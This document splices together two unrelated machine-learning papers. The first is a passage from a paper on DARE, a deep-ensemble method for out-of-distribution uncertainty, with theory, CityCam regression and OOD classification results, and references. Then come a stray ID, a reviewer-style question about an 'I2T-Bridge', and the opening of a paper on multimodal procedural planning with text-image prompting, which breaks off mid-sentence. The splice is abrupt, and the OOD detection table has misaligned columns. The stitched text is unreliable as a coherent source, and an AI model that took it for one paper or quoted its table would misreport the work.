\tau}{s_k^2} - \theta_k^*$ is more likely to be negative, leading to $\sigma_k = 0$ (cf Eq. (7)). Besides, $\theta_k^*$ is generally higher for higher $s_k^2$ as it corresponds to more informative feature, enhancing the effect $\sigma_k = 0$ for large $s_k^2$. We see the importance of choosing a strictly concave function like the logarithm (cf Section 2.2), if instead of log, we choose the identity function for instance, then the solution of (8) degenerates to $\sigma^2 = (0, ..., 0, \frac{\delta \tau}{s_p^2})$ with $s_p^2$ the lowest feature variance. In this case, all the weight variance is assigned to one component, which reduces the likelihood to detect a deviation of a potential OOD input on another low variance feature. From Theorem 1, we now derive the expression of the DARE prediction variance for any data $x \in \mathbb{R}^p$: **Corollary 1.1.** Let $\mathcal{H}_\tau$ be the large weights ensemble defined by Assumptions 4, 5, 6 and $x \in \mathbb{R}^p$ an input data, the variance of prediction for $h_\theta \in \mathcal{H}_\tau$ is: $$ \text{Var}_{\theta \sim \Theta_{\sigma^2}} [h_\theta(x)] = \sum_{k=1}^{p} x_k^2 \max \left[ \frac{C \delta \tau}{s_k^2} - \theta_k^*, 0 \right] $$ (9) We deduce from Corollary 1.1 that the prediction variance for $x$ is large when the components $x_k^2$ are large for features with low variance ($s_k^2 \ll 1$). Thus, the predicted uncertainty of DARE is correlated with deviations in directions in which the training input data has small variance. Applied to the hidden-layers of deep fully-connected neural networks, Theorem 1 and Corollary 1.1 suggest that the weight variance is larger in front of neurons weakly activated by the training data. In this case, OOD data that activate such neurons propagate large values inside the network, resulting in a large output variance. ### 3 RELATED WORKS Increasing ensemble diversity has been an enduring paradigm since the early days of the ensemble learning research. At first, diversity was seen as a key feature for improving the generalization ability of the ensembles (Brown et al., 2005; Kuncheva & Whitaker, 2003; Liu & Yao, 1999; Zhang et al., 2008). Then, with the growing interest in uncertainty quantification, the primary objective of ensemble diversity becomes to produce good uncertainty estimates. In this perspective, a first category of methods propose to increase diversity by using diverse architectures or training conditions among an ensemble of deep neural networks (Lakshminarayanan et al., 2017; Wen et al., 2020; Wenzel et al., 2020; Zaidi et al., 2021). The underlying idea is that the diversity of architecture or local minima reached by the different networks induce a diversity of predictions. Another category of methods propose to explicitly impose a diversity constraint in the loss function of the networks. The loss function is then written $\mathcal{L} + \lambda \mathcal{P}$ where $\mathcal{L}$ is the loss for the task (e.g. mean squared error or negative log-likelihood (NLL)), $\mathcal{P}$ is a penalty term which decreases with the diversity of the ensemble and $\lambda$ is the trade-off parameter between the two terms. Three kinds of penalization are distinguished in the literature. The first kind makes use of training data to compute the penalty term. It includes the Negative Correlation method (NegCorr) (Shui et al., 2018; Zhang et al., 2020) which applies the penalization from (Liu & Yao, 1999) to deep ensembles to enforce a negative correlation between the errors of the networks on the training set. Similarly, (Ross et al., 2020) imposes an orthogonality constraint between the gradients of the ensemble members on training data. Penalizing the similarity between hidden representations of the networks has also been proposed by (Rame & Cord, 2021; Sinha et al., 2021) using adversarial training. The second kind of penalization refers to contrastive methods that enforces diversity on potential OOD instances rather than training data. This avoids the issue of being over-conditioned by the training domain that can be encountered by previous methods. In this category, several methods suppose that an unlabeled sample containing OOD is available. (Pagliardini et al., 2022; Tifrea et al., 2022). Others avoid this restrictive assumption and simulate potential OOD with random uniform data (Jain et al., 2020; Mehrtens et al., 2022) or instances localized around the training data (Segonne et al., 2022). In the last approach, considered by Anchored-Networks (AnchorNet) (Pearce et al., 2018) and Repulsive Deep Ensemble (RDE) (D’Angelo & Fortuin, 2021), the penalization $\mathcal{P}$ is a function of the network’s parameters which... forces the networks to reach local minima spaced from each other in parameters space. Our proposed DARE approach relates particularly to these two methods. Our assumption is that imposing weights diversity has more chance to obtain a global output diversity rather than imposing it on specific data regions as done by the two previous kind of penalization. Anchored-Networks appears to be an efficient tool, for instance, in the detection of corrupted data (Ulmer et al., 2020), however, it is very hard to set the right anchors and trade-off parameter (Scalia et al., 2020). Large initial variance can lead to large weight variance but may not converge to accurate model in-distribution. The DARE approach is more practical as it starts to increase the weights after reaching an acceptable loss threshold which ensures to fit the training data. 4 EXPERIMENTS The experiments are conducted on both regression and classification datasets. The source code of the experiments is available on GitHub.\footnote{https://github.com/AnonymousAccount3/dare} We consider the following competitors: Deep-Ensemble (DE) (Lakshminarayanan et al., 2017), NegCorr (Shui et al., 2018), AnchorNet (Pearce et al., 2018), MOD (Jain et al., 2020) and RDE (D’Angelo & Fortuin, 2021). All are deep ensemble methods presented in Section 3. AnchorNet, NegCorr and MOD introduce a penalty term in the loss function multiplied by a trade-off parameter $\lambda$. The trade-off $\lambda$ and the anchor initialization parameter $\sigma$ for AnchorNet are selected through hold-out validation, as suggested in (Jain et al., 2020; Pearce et al., 2018). The kernel bandwidth for RDE is adaptive and chosen with the median heuristic as suggested in the corresponding work (D’Angelo & Fortuin, 2021). The validation loss is monitored across epochs. We restore the weights, at the training end, corresponding to the best validation loss epoch. For DARE, the parameter $\delta$ is set to $1/4$ and the weight saving strategy follows the monitoring process described in Section 2.2. If nothing else is specified, the experiments are performed with ensemble of $M = 5$ fully-connected networks with 3 hidden layers of 100 neurons each and ReLU activations. The Adam optimization algorithm is used with learning rate 0.001 (Kingma & Ba, 2015). The batch size is chosen equal to 128. The experiments are repeated 5 times to compute standard deviations for the scores. For the regression experiments, we use the Gaussian NLL defined in (Lakshminarayanan et al., 2017) as loss function. Each network in the ensemble returns the 2-dimensional output $h_\theta(x) = (\mu_\theta(x), \sigma_\theta(x))$, for any $x \in \mathcal{X}$. The mean prediction of the ensemble $(\bar{h}_\theta(1), ..., \bar{h}_\theta(M))$ is then equal to $\bar{\mu}(x) = (1/M) \sum_{m=1}^{M} \mu_\theta(m)(x)$ and the prediction variance is computed through $\bar{\sigma}(x) = (1/M) \sum_{m=1}^{M} (\sigma_\theta(m)(x)^2 + \mu_\theta(m)(x)^2) - \bar{\mu}(x)^2$. For the classification experiments, the loss function is the NLL and a softmax activation is added at the end-layer of the networks, following common practice in the classification setting. However, for DARE, we observe that the softmax activation cancels the effect of increasing the weights. Indeed, the softmax activation inverses the correlation between large outputs and high uncertainty, resulting in over-confidence for OOD data. To avoid this negative effect, the loss function is set to the mean squared error, scaled by the number of classes: $\ell(h_\theta(x), y) = ||h_\theta(x) - K y||_2^2$, for any $x, y \in \mathcal{X} \times \mathcal{Y}$, with $y$ the one-hot encoded label, $h_\theta(x)$ the predicted logit and $K$ the number of classes. To provide uncertainty quantification, we define the following "ad-hoc" uncertainty score: $$u(x) = \frac{1}{M} \sum_{m=1}^{M} ||h_\theta(m)(x) - K \hat{y}_m||_2^2 + \frac{1}{M} \sum_{m=1}^{M} ||h_\theta(m)(x) - \bar{h}(x)||_2^2.$$ Where $\hat{y}_m$ is the one-hot encoding of the estimated label: $\arg\max_{k \in [1,K]} h_\theta(m)(x)_k$ and $\bar{h}(x) = (1/M) \sum_{m=1}^{M} h_\theta(m)(x)$. Equation (10) can be interpreted as the addition of the individual uncertainty estimation of each member to the ensemble prediction variance. In the majority of previous works, OOD uncertainty quantification is studied in the perspective of OOD detection in the classification setting where examples from other classes / datasets are considered as OOD (D’Angelo & Fortuin, 2021; Lakshminarayanan et al., 2017; Liu et al., 2022; Van Amersfoort et al., 2020). For regression, few attempts of uncertainty quantification on shifted datasets have been conducted: (Jain et al., 2020) separates male and female faces for age prediction dataset and (Jain et al., 2020; Foong et al., 2019; Segonne et al., 2022) propose OOD version of several UCI regression datasets (Dua & Graff, 2017). In this work, we propose a novel regression setup for uncertainty estimations on shifted domains based on the CityCam dataset (Zhang et al., 2017) which has been used in several domain adaptation regression experiments (de Mathelin et al., 2020; Zhao et al., 2018). Our setup models real-life domain shift scenarios where uncertainty quantification is challenged and offers a clear visual understanding of the domain shifts (cf Figure 3). For the classification experiments, we consider the OOD detection setup developed in (D’Angelo & Fortuin, 2021). 4.1 Synthetic experiments We consider the "two-moons" binary classification dataset and the 1D regression experiment developed in (Pain et al., 2020). The visualization of the results is provided in Figure 1. The full description of the experiments is reported in Appendix. We are interested in confirming the theoretical insights derived in Section 3, i.e. the weight variance is proportional to the training neuron activation variance and OOD data that activate neurons of small training activation variance propagate large values inside the network. Figure 2 presents the predicted uncertainty heat-map for one DARE network as well as the internal layer representations for the classification experiment. We observe that the OOD neuron activations grow from one layer to the next. A correspondence between features with low variance for the training data and large weights can be clearly observed. In the last hidden layer (layer 3), the OOD components are large in direction of low training variance (components 80 to 100) to which correspond large weights. This observation explains the large uncertainty score for the OOD example. ![Figure 2: Internal analysis of a DARE network](image) The uncertainty produced by one DARE member is presented on the left. On the right, the two figures on top present the expression of the training distribution in the three hidden layers (in blue) compared to the representation of one OOD example (in red). The components (neuron activations) are sorted in descending order of training variance. The two bottom figures present the average weight in front of each component, i.e. the mean weights that multiply the layer components to produce the next layer representation. 4.2 Regression experiments on CityCam We propose, here, a novel regression setup for uncertainty estimations on shifted domains based on the CityCam dataset (Zhang et al., 2017) which has been used in several domain adaptation regression experiments (de Mathelin et al., 2020; Zhao et al., 2018). Our setup models real-life domain shift scenarios where uncertainty quantification is challenged and offers a clear visual understanding of the domain shifts (cf Figure 3). The CityCam dataset is composed of images coming from different traffic cameras. The task consists in counting the number of vehicles present on the image, which is useful, for instance, to control the traffic in the city. To get relevant features for the task, we use the features of the last layer of a ResNet50 (He et al., 2016) pretrained on ImageNet (Deng et al., 2009). We propose three different kinds of domain shift: Figure 3: **CityCam experimental setups.** The top blue images correspond to in-distribution examples and bottom orange images to OOD examples. 1. **Camera-shift:** This experiment uses the images from 10 cameras in the CityCam dataset. For each round, 5 cameras are randomly selected as in-distribution while the 5 remaining cameras are considered as out-of-distribution. 2. **Bigbus-shift:** Images marked as "big-bus" referring to the fact that a bus appears and masks a significant part of the image (Zhang et al., 2017) are used to create the OOD dataset. 3. **Weather-shift:** Blurry images caused by water drops landed on the camera are used as OOD dataset. These three experiments model real-life uncertainty quantification problems as the generalization of uncertainty estimates to unseen domains (camera-shift), the robustness to changes in data acquisition (weather-shift) and the detection of rare abnormal event (bigbus-shift). Further details on these experimental setups are provided in Appendix. | Methods | Camera | Bigbus | Weather | Camera | Bigbus | Weather | |------------------|--------|--------|---------|--------|--------|---------| | Deep Ensemble | 96.71 (0.54) | 97.60 (0.15) | 96.50 (0.15) | 63.0 (3.9) | 78.9 (0.9) | 88.8 (0.2) | | Negative Correlation | 96.97 (1.34) | 97.68 (0.46) | 96.50 (1.37) | 63.8 (6.8) | 79.4 (2.9) | 89.0 (0.6) | | MOD | 97.22 (1.05) | 97.82 (0.07) | 95.90 (0.15) | 65.6 (5.6) | 79.3 (0.0) | 88.8 (0.8) | | Anchored Networks | 96.44 (0.32) | 96.72 (0.59) | 96.66 (0.30) | 64.1 (3.6) | 76.8 (2.2) | 89.8 (0.0) | | RDE | 96.83 (0.13) | 97.19 (0.07) | 96.35 (0.61) | 64.0 (3.9) | 77.3 (0.4) | 89.2 (1.2) | | DARE | 96.98 (0.16) | 96.55 (0.61) | 97.42 (0.15) | 70.9 (2.4) | 80.0 (0.7) | 93.7 (0.0) | Table 1: **In-distribution and Out-of-distribution Coverage for CityCam.** The coverage scores are reported after using conformal prediction on the validation dataset. The number of epochs is set to 100 for Camera-shift and Bigbus-shift, and 200 for Weather-shift, based on the number of instances in the datasets. We notice that all methods fully converge before reaching this limit of epochs. To assess the ensemble quality for the regression experiments, we consider the "conformalized Out-of-distribution coverage". To compute this metric, the predicted standard deviations $\sigma(x)$ are used to produce confidence intervals of level $1 - \alpha$, such that: $$C(x, \beta) = [\mu(x) + \Phi(\alpha/2)\sigma(x) - \beta, \mu(x) + \Phi(1 - \alpha/2)\sigma(x) + \beta],$$ with $\Phi$ the cdf of the normal distribution and $\beta \leq 0$. The confidence intervals are then "conformalized" using conformal prediction (Romano et al., 2019), the parameter $\beta \in \mathbb{R}$ is then defined such that a proportion $1 - \alpha$ of the validation data $(x, y)$ verify: $y \in C(x, \beta)$. We consider a confidence level $\alpha = 0.05$ and compute the coverage on the respective test and OOD datasets as follows: $$\text{Cov}_{\text{test}} = \frac{1}{|\mathcal{S}_{\text{test}}|} \sum_{(x,y) \in \mathcal{S}_{\text{test}}} \mathbf{1}(y \in C(x, \beta))$$ $$\text{Cov}_{\text{ood}} = \frac{1}{|\mathcal{S}_{\text{ood}}|} \sum_{(x,y) \in \mathcal{S}_{\text{ood}}} \mathbf{1}(y \in C(x, \beta))$$ The results are reported in Table 1. We first observe that the test coverage for all methods is very similar, as a consequence of the "conformalization" on the validation dataset which follows the same distribution as the test set. We observe, however, that DARE outperforms other uncertainty quantification methods in terms of OOD coverage for the three experiments. In the camera-shift experiment, for instance, the Out-of-distribution coverage for DARE is more than 5 points above the second-best method. ### 4.3 Classification Experiments | Methods | SVHN | CIFAR10 | CIFAR100 | Accuracy | CIFAR10 | Fashion-MNIST | MNIST | Accuracy | |-------------|------|---------|----------|----------|---------|---------------|-------|----------| | DE (NLL) | 90.9 (0.4) | 86.4 (0.2) | **91.8 (0.1)** | 89.7 (0.9) | 62.7 (6.2) | **89.2 (0.2)** | | AnchorNet | 91.0 (0.3) | **86.5 (0.2)** | **91.8 (0.0)** | 88.8 (1.1) | 68.7 (6.2) | 89.1 (0.2) | | MOD | 91.3 (0.3) | 86.3 (0.3) | 91.7 (0.1) | 89.4 (1.7) | 60.8 (2.7) | 88.7 (0.4) | | NegCorr | 91.3 (0.4) | 86.3 (0.4) | 91.7 (0.1) | 91.5 (0.8) | 68.9 (4.5) | 86.1 (0.6) | | RDE | 91.2 (0.5) | 86.4 (0.3) | **91.8 (0.1)** | 90.1 (0.9) | 70.9 (5.8) | 89.1 (0.3) | | DE (MSE) | 85.9 (1.2) | 77.7 (0.8) | 91.7 (0.1) | 96.5 (0.5) | 93.0 (5.3) | 88.6 (0.1) | | DARE | **92.6 (0.7)** | 82.7 (0.5) | **91.8 (0.1)** | **97.7 (0.5)** | **97.4 (1.3)** | 87.2 (0.2) | Table 2: OOD detection results. AUROC scores and ID accuracy are reported. We consider the experimental setup defined in [D’Angelo & Fortuin, 2021] for OOD detection on Fashion-MNIST and CIFAR10. The MNIST dataset is used as OOD dataset for Fashion-MNIST and the SVHN dataset for CIFAR10. We extend the experiments by adding CIFAR10 as OOD for Fashion-MNIST and CIFAR100 as OOD for CIFAR10. Thus, for both experiments, OOD detection is performed on both "Near-OOD" and "Far-OOD" datasets [Liu et al., 2022]. To reduce the need of computational resources for CIFAR10, we consider the "multi-head" setting [Lee et al., 2015], where deep ensemble of fully-connected networks are trained over the penultimate layer of a pretrained ResNet32 [He et al., 2016]. The obtained results are reported in Table 2 for DARE and the competitors. To fully evaluate the impact of the DARE optimization, we add the results obtained with a Deep Ensemble trained with the mean squared error (DE (MSE)) which is equivalent to a DARE with $\lambda = 0$. We train 5 networks in each ensemble and repeat the experiments 5 times. The AUROC metric is used, computed with the uncertainty score defined in Equation (10) for DARE and DE (MSE) and the entropy for the other methods. We observe that DARE globally improves the OOD detection. For instance, in Fashion-MNSIT, we observe an improvement of 8 points on CIFAR10 and 34 points on MNIST compared to DE, with a loss of only 2 points of in-distribution accuracy. Mild results are obtained for CIFAR10, we observe an improvement for SVHN but not for CIFAR100. We argue that it is mainly due to the use of the mean squared error, which is not suited for this experiment, as indicated by the poor results of DE (MSE). Notice that for the Fashion-MNIST experiment, the contrary is observed, as DE (MSE) provides an important improvement. We finally underline that, DARE always performs better than its DE (MSE) counterpart. ## 5 Limitations and Perspectives For now, the efficiency of DARE is limited to fully-connected neural network with piece-wise linear activation and linear end-activation. Moreover, the threshold setting is still based on a heuristic, which may be suboptimal. We have seen, however, that DARE can benefit to a final fully-connected network head placed on top of deep features obtained with convolutions. Thanks to the practical aspect of DARE, the method can be combined to other deep ensemble or OOD detection methods. One can use a specific training process and then apply DARE afterward to increase diversity. Future work will consider a "Bayesian" version of DARE by adding Gaussian noise with increasing variance to the weights of pretrained networks. ## References Moloud Abdar, Farhad Pourpanah, Sadiq Hussain, Dana Rezazadegan, Li Liu, Mohammad Ghavamzadeh, Paul Fieguth, Xiaochun Cao, Abbas Khosravi, U Rajendra Acharya, et al. A review of uncertainty quantification in deep learning: Techniques, applications and challenges. *Information Fusion*, 76:243–297, 2021. S Boyd, L Vandenberghe, and L Faybusovich. Convex optimization. *IEEE Transactions on Automatic Control*, 51(11):1859–1859, 2006. Gavin Brown, Jeremy L Wyatt, Peter Tino, and Yoshua Bengio. Managing diversity in regression ensembles. *Journal of machine learning research*, 6(9), 2005. Jiwoong Choi, Dayoung Chun, Hyun Kim, and Hyuk-Jae Lee. Gaussian yolov3: An accurate and fast object detector using localization uncertainty for autonomous driving. In *Proceedings of the IEEE/CVF International Conference on Computer Vision*, pp. 502–511, 2019. Francesco D’Angelo and Vincent Fortuin. Repulsive deep ensembles are bayesian. *Advances in Neural Information Processing Systems*, 34, 2021. Francesco D’Angelo and Christian Henning. Uncertainty-based out-of-distribution detection requires suitable function space priors. *arXiv preprint arXiv:2110.06020*, 2021. Antoine de Mathelin, Guillaume Richard, Francois Deheeger, Mathilde Moungeot, and Nicolas Vayatis. Adversarial weighting for domain adaptation in regression. *arXiv preprint arXiv:2006.08251*, 2020. Antoine de Mathelin, François Deheeger, Mathilde Moungeot, and Nicolas Vayatis. Handling distribution shift in tire design. In *NeurIPS 2021 Workshop on Distribution Shifts: Connecting Methods and Applications*, 2021. Jia Deng, Wei Dong, Richard Socher, Li-Jia Li, Kai Li, and Li Fei-Fei. Imagenet: A large-scale hierarchical image database. In *2009 IEEE conference on computer vision and pattern recognition*, pp. 248–255. Ieee, 2009. Dheeru Dua and Casey Graff. UCI machine learning repository, 2017. URL http://archive.ics.uci.edu/ml Di Feng, Lars Rosenbaum, and Klaus Dietmayer. Towards safe autonomous driving: Capture uncertainty in the deep neural network for lidar 3d vehicle detection. In *2018 21st International Conference on Intelligent Transportation Systems (ITSC)*, pp. 3266–3273. IEEE, 2018. Andrew YK Foong, Yingzhen Li, José Miguel Hernández-Lobato, and Richard E Turner. ’in-between’uncertainty in bayesian neural networks. *arXiv preprint arXiv:1906.11537*, 2019. Yarin Gal and Zoubin Ghahramani. Dropout as a bayesian approximation: Representing model uncertainty in deep learning. In *international conference on machine learning*, pp. 1050–1059. PMLR, 2016. Kaiming He, Xiangyu Zhang, Shaoqing Ren, and Jian Sun. Deep residual learning for image recognition. In *Proceedings of the IEEE conference on computer vision and pattern recognition*, pp. 770–778, 2016. S. D. Jain and K. Grauman. Active image segmentation propagation. In *2016 IEEE Conference on Computer Vision and Pattern Recognition (CVPR)*, pp. 2864–2873, 2016. Siddhartha Jain, Ge Liu, Jonas Mueller, and David Gifford. Maximizing overall diversity for improved uncertainty estimates in deep ensembles. In *Proceedings of the AAAI Conference on Artificial Intelligence*, volume 34, pp. 4264–4271, 2020. Diederik P. Kingma and Jimmy Ba. Adam: A method for stochastic optimization. In Yoshua Bengio and Yann LeCun (eds.), *3rd International Conference on Learning Representations, ICLR 2015, San Diego, CA, USA, May 7-9, 2015, Conference Track Proceedings*, 2015. Ludmila I Kuncheva and Christopher J Whitaker. Measures of diversity in classifier ensembles and their relationship with the ensemble accuracy. *Machine learning*, 51(2):181–207, 2003. Balaji Lakshminarayanan, Alexander Pritzel, and Charles Blundell. Simple and scalable predictive uncertainty estimation using deep ensembles. *Advances in neural information processing systems*, 30, 2017.
jTsnuWsda2
What can I2T-Bridge specifically correct when it is used to correct textual instructions? If the images generated by the text-to-image model are not good enough, can the images be further corrected based on the corrected text?
MULTIMODAL PROCEDURAL PLANNING VIA DUAL TEXT-IMAGE PROMPTING Anonymous authors Paper under double-blind review Figure 1: Our dual Text-Image Prompting (TIP) model generates coherent and authentic multimodal procedural plans towards a high-level goal, providing useful guidelines in task completion. ABSTRACT Embodied agents have achieved prominent performance in following human instructions to complete tasks. However, the potential of providing instructions informed by texts and images to assist humans in completing tasks remains underexplored. To uncover this capability, we present the multimodal procedural planning (MPP) task, in which models are given a high-level goal and generate plans of paired text-image steps, providing more complementary and informative guidance than unimodal plans. The key challenges of MPP are to ensure the informativeness, temporal coherence, and accuracy of plans across modalities. To tackle this, we propose Text-Image Prompting (TIP), a dual-modality prompting method that jointly leverages zero-shot reasoning ability in large language models (LLMs) and compelling text-to-image generation ability from diffusion-based models. TIP improves the interaction in the dual modalities using Text-to-Image Bridge and Image-to-Text Bridge, allowing LLMs to guide the textual-grounded image plan generation and leveraging the descriptions of image plans to ground the textual plan reversely. To address the lack of relevant datasets, we collect WikiPlan and RecipePlan as a testbed for MPP. Our results show compelling human preferences and automatic scores against unimodal and multimodal baselines on WIKIPLAN and RECIPEPLAN in terms of informativeness, temporal coherence, and plan accuracy.\footnote{Our code and data are provided in supplemental materials.} 1 INTRODUCTION Recent advances in embodied \cite{Huang2022} and conversational \cite{Qiu2021} agents achieve prominent performance in task completion as humans by following instructions informed by texts and images. However, to what extent the models can provide useful guidelines for humans to complete the task remains underexplored. To uncover this, we propose the multimodal procedural planning task (as shown Figure 1). The task aims to generate goal-conditioned (e.g., “How to make traditional szechuan chicken”) text (e.g., “a teaspoon of light soy sauce” explain how to marinade chicken in Step 2) and image (e.g., help identify the ingredients “chicken, garlic, ginger, and light soy sauce” in Step 1) plans as useful guidelines to assist humans in task completion. Previous work \cite{Huang2022} explored the generation of procedural plans in text-only form. In contrast, we generate both text and image plans, which provide guidance to perform tasks that acquire complementary information from multimodal contexts. Generating plans in both text and image form poses new challenges since the generated plans should: a) be informative enough in both the text and image modalities, b) obey commonsense temporal coherence, such as the order of steps, and c) achieve high plan accuracy, indicating the complementary and alignment among multimodal plans. Despite significant progress \cite{Kojima2022, Song2022} in the development of large language models (LLMs), they are unable to generate images. Existing text-to-image (T2I) models can generate high-quality images conditioned on textual instructions \cite{Ramesh2022, Rombach2022, Brooks2022}. However, they are limited in their ability to generate images that require complex text comprehension, such as temporal reasoning (e.g., “learn basic surf safety before hitting the waves”) and physical reasoning (e.g., “pick up the wine glass”). Additionally, generating text and image plans separately using LLMs and T2I models results in inconsistency and incoherence between the two modalities. In this paper, we propose Text-Image Prompting (TIP), a novel dual-modality prompting framework that jointly leverages the capabilities of LLMs and T2I models for multimodal procedural planning. We first generate vanilla text plans by querying LLMs \cite{Kojima2022} for step-by-step procedures. To generate textual-grounded image plans, we devise the Text-to-Image Bridge (T2I-B), which elicits the complex language comprehension abilities of LLMs to assist T2I models in generating informative and text-aligned image plans. Similarly, we generate visual-grounded text plans using the Image-to-Text Bridge (T2I-B), which verbalizes the image plans and injects them back into LLMs to assist the text plans revision, thereby improving informativeness. The temporal coherence of the generated plans is improved considering the context of both text and image. Benefiting from our dual-modality prompting, our generated plans are complementary and aligned across text and image modalities. To address the lack of suitable datasets for evaluating multimodal procedural planning, we collect the WIKIPLAN and RECIPEPLAN datasets for benchmarking the task. We empirically evaluate the effectiveness of TIP on WIKIPLAN and RECIPEPLAN in a zero-shot setting and compare it with various baselines. Our results demonstrate that TIP generate plausible multimodal plans that are informative, temporally coherent, and accurate. Our work highlights the potential of combining knowledge from LLMs and T2I models to uncover multimodal zero-shot planning capabilities. Our main contributions are as follows: • We introduce the multimodal procedural planning task and evaluate model performance using our collected WIKIPLAN and RECIPEPLAN datasets. • We propose Text-Image Prompting (TIP), a dual-modality prompting approach that elicits procedural knowledge jointly from LLMs and T2I models, enabling visual-grounded text plans and textual-grounded image plans. • We show that TIP substantially improves performance in terms of textual and visual informativeness, temporal coherence, and plan accuracy on human and automatic evaluations. Figure 2: The vanilla text plan is generated using LLM. Our Text-Image Prompting (TIP) generates the textual-grounded image plan using T2I-Bridge (Fig. 3) and the visual-grounded text plan using I2T-Bridge (Fig. 5). The colors blue and green highlight the improved grounding in text and image respectively. 2 RELATED WORK Procedural Planning This task (Zhang et al., 2020; Chang et al., 2020) has gained much attention in various aspects, including robotics (Tellex et al., 2011; Jansen, 2020; Brohan et al., 2022), vision-and-language navigation (Anderson et al., 2018), conversational assistants (Ilievski et al., 2018; Qiu et al., 2021, 2022; Yang et al., 2022a), and animation (Zhao et al., 2022). Recent work is extended to the multimodal scenarios (Wu et al., 2022; Song et al., 2022; Wang et al., 2022c). In this work, we explore the multimodal procedural planning that generates goal-conditioned text and image sequences grounded in a multimodal context. Multimodal Generative Models Recently advanced diffusion models (Ramesh et al., 2022; Rombach et al., 2022) have shown remarkable abilities in generating high-quality images given text prompts. However, generating images with desired semantics requires proper prompts, which often come from a number of trials and errors (Liu & Chilton, 2022). To get more controllable generations, researchers have used large language models (LLMs) to expand input prompts with rich contextual knowledge. InstructPix2Pix (Brooks et al., 2022) combines the knowledge of GPT-3 and Stable Diffusion to generate large-scale examples of image editing as training data. In turn, recent advances in large-scale models based on transformers (Li et al., 2022; Wang et al., 2022a) exhibit incredible ability in image captioning, describing the given image using natural language. Injecting Visual Knowledge in LLMs Incorporating visual knowledge into large language models through visual imagination is a promising area of research. This can be achieved through the use of existing images as augmented visual features for language models, or through the generation of images to provide additional visual supervision to language models (Yang et al., 2022b). Studies such as Zhang et al. (2021b); Yang et al. (2022b); Zhu et al. (2022a); Lu et al. (2022b); Liu et al. (2022) have demonstrated the effectiveness of this approach. Our proposed TIP exploits the image descriptions in language form to inject the visual knowledge into LLMs and elicit its potential zero-shot reasoning ability to ground the textual sentences in the verbalized visual context. 3 OUR APPROACH 3.1 Problem Definition We formulate multimodal procedural planning as a conditional text and image sequence generation problem. Given a high-level goal $G$ in natural language form, the model generates a sequence of low-level steps $S = \{s_1, s_2, ..., s_n\}$. Each step $s_i$ in the sequence is represented by a paired text $t_i$ and image $v_i$ at timestep $i$. The text plan $\{t_1, t_2, ..., t_n\}$ and image plan $\{v_1, v_2, ..., v_n\}$ are both intended to be informative in their respective modalities and complementary across modalities. The final multimodal procedural plans \( S \) is the combination of the text plan and image plans, which describe the procedure of completing the high-level goal. ### 3.2 Method Overview We first elicit the zero-shot step-by-step reasoning ability in large language models (LLMs) to generate a vanilla text-only plan (left part in Figure 2). To enable grounding in multimodal context, we propose Text-Image Prompting (TIP), a dual-modality prompting method (middle part in Figure 2) upon LLMs and multimodal generative models: (1) Text-to-Image Bridge (T2I-B): we generate the visual imaginative prompt that translates the complex textual instructions (vanilla plan in Figure 3) into explicit scene descriptions (prompt in Figure 3 for text-to-image models. (2) Image-to-Text Bridge (I2T-B): we verbalize the image plan with the image captioning model for generating prompts (red highlighted template in Figure 5) that elicit the revision ability of LLMs with awareness of context. Figure 2 depicts how TIP implements multimodal procedural planning by connecting LLMs and multimodal generative models (Image Caption Model, Text-to-Image Model) with our T2I-B and I2T-B, grounding the image plans in textual context and the text plan in visual context respectively (right part in Figure 2). ### 3.3 Vanilla Text Plan Generation We first elicit procedural knowledge of LLM to generate vanilla text plan using Zero-shot Chain-of-Thought [Kojima et al., 2022] that does not require heavy human-engineered few-shot examples. Specifically, we leverage InstructGPT [Ouyang et al., 2022] to generate a goal-conditioned step-by-step procedure with the template “\[TEMPLATE\] Task: \[GOAL\]?”. \[TEMPLATE\] represents the hand-crafted template to extract the procedural knowledge from LLM. We extend the template “Let’s think step by step” (proposed in [Kojima et al., 2022]) as “What’s the step-by-step procedure of” for procedural planning. Then we replace the input slot \[GOAL\] with the given task name \( T \) (the high-level goal description) as the prompt \( P \) to be fed into the LLM. The LLM then outputs goal-conditioned subsequent steps \( W = \{t_1, t_2, ..., t_n\} \) using greedy decoding as our initial textual plan, which is conditioned only on the task name \( T \) in zero-shot generation manner. ### 3.4 Textual-Grounded Image Plan Generation with Text-to-Image Bridge Our Text-to-Image Bridge (T2I-B) in Figure 3 leverages LLM to bridge the gap between the language understanding capabilities of LLM and the ability of language-conditioned image generation in the text-to-image model. T2I-B elicits visual imagination in LLM to generate explicit scene description (imagination prompt) for text-to-image model conditioned on the vanilla plan. **Imagination Prompt Generation** We encourage LLM to revise the prompt that already processes the physical or temporal meaning residing in the original textual plan. To access this, for each step, we use the prompt \( P_{t2i} \) “\[STEP\] \[T2I-B\]” that concatenates the original generated textual plan at step \( i \) and the Text-to-Image Bridge template. \[STEP\] represents one of the subsequent steps generated from LLMs. For \[T2I-B\], we use the trigger sentence similar to “What do I need to draw in the picture to describe the above text?”. With this Text-to-Image Bridge guided prompt \( P_{t2i} \), the text-to-image model then generates the textual grounded image at each timestep to compose the final sequence of visual plan \( V = \{v_1, v_2, ..., v_n\} \). ![Figure 3: T2I-B for textual-grounded image plan.](image-url) Text-to-Image Generation We exploit the Stable Diffusion (Rombach et al., 2022) model to generate RGB images at $512 \times 512$ resolution. Figure 4 provides examples of text-to-image generation with and without our T2I-B. Benefiting from the existing knowledge in LLMs, the text-to-image models are able to generate semantically relevant and high-fidelity images based on the already processed prompt. 3.5 Visual-Grounded Text Plan Generation with Image-to-Text Bridge To enhance the completeness, alignment, and knowledge exchange between the generated text and image plans, we propose revising the vanilla text plan using the textual-grounded image plan. Image Verbalization To complete this, we first need to transfer the visual plan into a natural language format and then inject it into LLM. We implement this by generating captions for each visual plan. Given the image $v$, the captioning model BLIP (Li et al., 2022) generates captions, which transfer the visual knowledge into textual descriptions. For each generated visual plan $v_i$ at each timestep $i$, we generate such pairwise caption with $caption = G(v_i, Desc)$, where $Desc$ denotes the task description for unified vision and language models, “what does the image describe” in our case. With these image captions, we can further transfer the visual-grounded information into LLM and revise our textual plan. Revision Generation To ground the textual plan in visual context, we use the verbalized description of the visual plan to concatenate with our Image-to-Text Bridge template similar to “Let’s revise the procedure using the captions”. Concretely, we concatenate the initial textual plan, the captions of the visual plan, and the Image-to-Text Bridge template as the prompt $P_{i2t}$ “Step-by-step Procedure: [INITIAL] Captions: [CAPTION] [I2T-B]”. In this way, we elicit the reasoning ability of LLMs to ground the textual plan in verbalized visual context, as depicted in Figure 5. To this end, our generated multimodal plan is bi-directional grounded by connecting the abilities of LLMs and multimodal generative models. 4 EXPERIMENTS 4.1 DATASETS Our datasets are collected and 